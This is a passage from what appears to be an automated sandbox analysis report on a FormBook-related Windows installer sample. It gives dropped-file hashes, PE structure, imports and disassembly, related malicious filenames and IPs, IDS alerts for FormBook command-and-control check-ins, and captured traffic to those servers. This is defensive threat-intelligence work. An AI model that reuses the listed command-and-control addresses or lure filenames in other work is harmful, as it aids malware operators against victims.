                                                                  • 184.175.123.49
                                                                  SecuriteInfo.com.W97m.Downloader.IWY.30727.docGet hashmaliciousBrowse
                                                                  • 216.198.213.62
                                                                  SecuriteInfo.com.W97m.Downloader.IWY.30727.docGet hashmaliciousBrowse
                                                                  • 216.198.213.62
                                                                  AS-HOSTINGERLTProforma Inv.xlsxGet hashmaliciousBrowse
                                                                  • 156.67.222.136
                                                                  qXDtb88hht.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                                  • 46.17.172.65
                                                                  SecuriteInfo.com.Scr.Malcodegdn30.8880.exeGet hashmaliciousBrowse
                                                                  • 2.57.89.36
                                                                  Shipping Docs677.exeGet hashmaliciousBrowse
                                                                  • 31.170.161.109
                                                                  item.exeGet hashmaliciousBrowse
                                                                  • 45.13.255.9
                                                                  RFQ_BRAT_METAL_TECH_LTD.exeGet hashmaliciousBrowse
                                                                  • 45.13.255.9
                                                                  POSWM240521.exeGet hashmaliciousBrowse
                                                                  • 45.13.255.9
                                                                  XmN6faVV2b.exeGet hashmaliciousBrowse
                                                                  • 193.168.194.233
                                                                  fbfcbf13_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 46.17.172.35
                                                                  EJIMS.exeGet hashmaliciousBrowse
                                                                  • 45.130.231.56
                                                                  bin.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                                  • 185.201.11.161
                                                                  netwire.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  O64Hou5qAF.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  PurchaseOrder#657Y200.exeGet hashmaliciousBrowse
                                                                  • 2.57.89.36
                                                                  noSpfWQqRD.exeGet hashmaliciousBrowse
                                                                  • 185.224.137.223
                                                                  94f0319a_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 194.59.164.91
                                                                  0e12ea4a_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                  • 195.110.59.2
                                                                  WLApa6bpDLcT5Ne.exeGet hashmaliciousBrowse
                                                                  • 46.17.172.65
                                                                  SOFTLAYERUSRef#Doc30504871 Wyg.htmGet hashmaliciousBrowse
                                                                  • 169.55.190.245
                                                                  7 #U039c#U0456#U0455#U0455#U0435d #U0441#U0430II#U0455.htmGet hashmaliciousBrowse
                                                                  • 169.46.118.100
                                                                  ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                  • 159.253.128.188
                                                                  06.08.21 Inv & AP Statement - Copy.htmGet hashmaliciousBrowse
                                                                  • 169.46.89.154
                                                                  Payment slip.exeGet hashmaliciousBrowse
                                                                  • 169.56.29.200
                                                                  a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                  • 119.81.95.146
                                                                  Windows Defender#U68c0#U67e5#U5de5#U5177.exeGet hashmaliciousBrowse
                                                                  • 50.23.197.95
                                                                  #U266b Audio_47920.wavv - - Copy.htmlGet hashmaliciousBrowse
                                                                  • 169.47.124.25
                                                                  BS.exeGet hashmaliciousBrowse
                                                                  • 103.226.228.233
                                                                  American Freight Payment Advice.htmlGet hashmaliciousBrowse
                                                                  • 169.47.124.25
                                                                  EASTWAY COMNAGA SB PAYMENT BANK IN SLIP 250521_PDF.exeGet hashmaliciousBrowse
                                                                  • 192.253.242.6
                                                                  de725d13_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 50.23.197.95
                                                                  $RAULIU9.exeGet hashmaliciousBrowse
                                                                  • 198.252.103.41
                                                                  Receipt565647864.htmlGet hashmaliciousBrowse
                                                                  • 158.177.118.97
                                                                  350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                  • 119.81.45.82
                                                                  Open_Invoice_and_statements.htmGet hashmaliciousBrowse
                                                                  • 158.176.79.200
                                                                  2x93jpW0Ac.dmgGet hashmaliciousBrowse
                                                                  • 108.168.175.167
                                                                  4wHhXGk3b9.dmgGet hashmaliciousBrowse
                                                                  • 108.168.175.167
                                                                  networkservice.exeGet hashmaliciousBrowse
                                                                  • 69.56.135.212
                                                                  6544THReceipt56GFHD.htmlGet hashmaliciousBrowse
                                                                  • 158.177.118.97

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                    New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                      L2.xlsxGet hashmaliciousBrowse
                                                                        Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                          New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                            2320900000000.exeGet hashmaliciousBrowse
                                                                              CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                                5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                  i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                    AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                      090049000009000.exeGet hashmaliciousBrowse
                                                                                        dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                                          PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                            Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                              Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                                  Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                    3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                      Shipping receipt.exeGet hashmaliciousBrowse
                                                                                                        New Order TL273723734533.pdf.exeGet hashmaliciousBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Temp\liw53s6e5g55t9
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):164864
                                                                                                          Entropy (8bit):7.998820292327425
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Qqr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4S:drlEXrPB2EtLTvbh21eq4S
                                                                                                          MD5:68A3F57B8B343B5F9BF05C9F35A086A3
                                                                                                          SHA1:29015249F259A9AAF76D3AD6774019CFBBD118FD
                                                                                                          SHA-256:D2D0C6EC98898B2B21BE258090B267AA98A5C4FEA808B37DC7BBAF38B900246F
                                                                                                          SHA-512:36538D7036BB092DC2E126387DAE328FB68EA53D3D7F8F3126AA986117EC569B32F11EC925192F75C1C7FA225BAF1C4BA88551F1AAF860444139E4A8ECC68B33
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: Q.Uc5.0..@..C6.,.(.../7...1.H]..$9.p.].#.|......?.2.e.$..3p....:.Dt .<...[...=.kJ.p(|Y.#I:Eq.....T...!);A......u.t.....*....IZo..z..2..S...h.pu.&.?.]....U.@9*.V.:.......d.-..........C..I.8...8nZ..k.....jRY..../.P.....a...h..\.{gv.m22........r..8g....A..<....I.N.L..LB+.A.|..9........l.L..'...>aQ6..K.|.^P..%.Hu.{.....c^.....r..>.X.j6+/.1..E#m../.x....h..<.#.p.G...!..p.~.H.SL..%...j.Cg.}V....p....:..z.-H.....%57`.._I..........l.....,x .jU....<.h-6L..."-yy...X.KA.$YT......z.$].R..>..M@q.)...6F.v27|l.4.@b!.h.I6{@.%..aP.~..HcX..%.<.h../.A....;.....:..X.Na....A.s,:..&..F..q..'.r.(!,..p.^..+.......F..%.?..>......c.e........Y......A@}....Ke..W{j.^?.xnD.I.g......,.....`...b.....yu.6.]....ud.U.z.1.?@-..6u.-.`..K*..$.T9J..bo....K.WA ....,:.Sd[Iz#.txD..)...v.....}.....]..4L.....^...:B....4|..sM..Q..2....mK...>.D~....+8[?.=.9..X!r.4.......~..c.!d}...hR&ee.`..... ......d....G..G...k..}...._#G..O..{....hw....s23p....-v.5...p.......,...F.^W....T..P".
                                                                                                          C:\Users\user\AppData\Local\Temp\nse5FE9.tmp
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):261211
                                                                                                          Entropy (8bit):7.359115600393562
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:7Sa/qr+Z8fcISfrPPGq2fMtOxyTAUPDhBWgOrigfLekt4l20fjumGLPNt:WaSrlEXrPB2EtLTvbh21eq4V7LGLFt
                                                                                                          MD5:AB8B0B65B223CDF58819B06790B548E2
                                                                                                          SHA1:0B678EAD9F82893461CC99EF27BEF78A3F3115F8
                                                                                                          SHA-256:205ACFB8E6DCF7203E2CE11F386D70851ABA48F2D7FF011A0B750E8092F94D29
                                                                                                          SHA-512:FA39DFB9E056C2EFFB8C1F28339C9A7487C3239E2042E8DFE7ECD87FC510A32824B1A5AADF98BFA57B3039736AB8317241453FB6BB6DAAE7208FC64A685125CB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: .m......,.......................LP......$l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11776
                                                                                                          Entropy (8bit):5.855045165595541
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                          MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                          SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                          SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                          SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                                          • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                                          • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                                          • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                                          • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                          • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                          • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                                          • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                                          • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                                          • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                          • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                          • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                          • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                          • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                          • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                          • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                          • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                          • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                          • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\Temp\xpwbfoj
                                                                                                          Process:C:\Users\user\Desktop\5t2CmTUhKc.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):56641
                                                                                                          Entropy (8bit):4.976767365562505
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:Y3DnyBc/8CaRs3+Z06O2vxZODPqSjlr7GBOEEjHzYtfgcBGUePl72zvHzUfysnp3:i4opae+Z0z0wr7G3EjT8cd72DUpGLu
                                                                                                          MD5:92B8B4963350C3A198E9513D086FBB3C
                                                                                                          SHA1:8B365235930D9864D7CA3D3A8B67E61D314EA560
                                                                                                          SHA-256:7CE31FC69C94A1917273EB7BF938EFB0BA57EDA5281E20BE8EF13E7D8BA302F9
                                                                                                          SHA-512:75C83B2DCE7EB57B059FA4C9C50A7F308CD2521868EB83011F15C51E96489C15E987D72B0907BF59698924140306D6348578BF114CABB0A0C1A86FC033FE02C1
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: U...........D.....E...B.F.....G.....H.....I.....J...?.K.....L.....M...v.N.....O.....P.....Q...?.R.....S...5.T.....U...p.V.....W.....X.....Y...7.Z.....[...P.\.....]...{.^....._...|.`.....a.....b.....c.....d...A.e.....f.....g...=.h.....i...T.j...7.k...1.l...|.m.....n...(.o.....p...?.q.....r...T.s...z.t.....u.....v...?.w.....x...T.y.....z...=.{.....|...T.}...?.~.........|...........=...........|.................{...........t.............................A.....9.............................=...........x.....7.....1.....t...........(...........?...........x.....z.................?...........x...........=...........x.....?...........t...........=...........t.................{...........l.............................A.....9.............................=...........p.....7.....1.....l...........(...........?...........p.....z.................?...........p

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.913752075626111
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:5t2CmTUhKc.exe
                                                                                                          File size:225177
                                                                                                          MD5:116e736ba00fca4b8499c4df00796454
                                                                                                          SHA1:a8d3d62db4bd49e24c2bda3d0d81c3be25a81dae
                                                                                                          SHA256:096ca35528ef4f702e93f5f17d7954f26fb48acd4526794ce1ee99d27cf1a4c3
                                                                                                          SHA512:02ddab82dd68faa0627c15320de3e0b118b1cc95fee80fc013e57ed773a9420af5b23f3bb7f9ccac216c88581b665db29bd1ca5e03f7e0b52f9c542d75b57f78
                                                                                                          SSDEEP:3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                          File Icon

                                                                                                          Icon Hash:b2a88c96b2ca6a72

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x40323c
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          sub esp, 00000180h
                                                                                                          push ebx
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          xor ebx, ebx
                                                                                                          push edi
                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                          mov dword ptr [esp+10h], 00409130h
                                                                                                          xor esi, esi
                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                          call dword ptr [00407030h]
                                                                                                          push 00008001h
                                                                                                          call dword ptr [004070B4h]
                                                                                                          push ebx
                                                                                                          call dword ptr [0040727Ch]
                                                                                                          push 00000008h
                                                                                                          mov dword ptr [00423F58h], eax
                                                                                                          call 00007FD84476DCAEh
                                                                                                          mov dword ptr [00423EA4h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 00000160h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 0041F458h
                                                                                                          call dword ptr [00407158h]
                                                                                                          push 004091B8h
                                                                                                          push 004236A0h
                                                                                                          call 00007FD84476D961h
                                                                                                          call dword ptr [004070B0h]
                                                                                                          mov edi, 00429000h
                                                                                                          push eax
                                                                                                          push edi
                                                                                                          call 00007FD84476D94Fh
                                                                                                          push ebx
                                                                                                          call dword ptr [0040710Ch]
                                                                                                          cmp byte ptr [00429000h], 00000022h
                                                                                                          mov dword ptr [00423EA0h], eax
                                                                                                          mov eax, edi
                                                                                                          jne 00007FD84476B0ACh
                                                                                                          mov byte ptr [esp+14h], 00000022h
                                                                                                          mov eax, 00429001h
                                                                                                          push dword ptr [esp+14h]
                                                                                                          push eax
                                                                                                          call 00007FD84476D442h
                                                                                                          push eax
                                                                                                          call dword ptr [0040721Ch]
                                                                                                          mov dword ptr [esp+1Ch], eax
                                                                                                          jmp 00007FD84476B105h
                                                                                                          cmp cl, 00000020h
                                                                                                          jne 00007FD84476B0A8h
                                                                                                          inc eax
                                                                                                          cmp byte ptr [eax], 00000020h
                                                                                                          je 00007FD84476B09Ch
                                                                                                          cmp byte ptr [eax], 00000022h
                                                                                                          mov byte ptr [eax+eax+00h], 00000000h

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                          RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                          RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                          RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                          RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                          RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                          USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          06/11/21-08:55:04.602555ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                          06/11/21-08:55:05.651055ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                          06/11/21-08:55:07.699033ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                          06/11/21-08:55:14.730818TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6185.224.138.83
                                                                                                          06/11/21-08:55:14.730818TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6185.224.138.83
                                                                                                          06/11/21-08:55:14.730818TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6185.224.138.83

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 11, 2021 08:55:08.907310009 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.183316946 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.183506966 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.183716059 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.459450006 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.463644028 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.463757038 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.463888884 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.463996887 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.738563061 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.680730104 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.730499983 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.730671883 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.730818033 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.780528069 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783538103 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783576965 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783593893 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783745050 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.783894062 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.784004927 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.784123898 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.833467007 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.106741905 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.305175066 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.305429935 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.305771112 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.504008055 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.505008936 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.505048037 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.505301952 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.505383015 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.703990936 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:25.699980974 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:25.861229897 CEST8049752184.175.83.64192.168.2.6
                                                                                                          Jun 11, 2021 08:55:25.861443043 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:25.861802101 CEST4975280192.168.2.6184.175.83.64
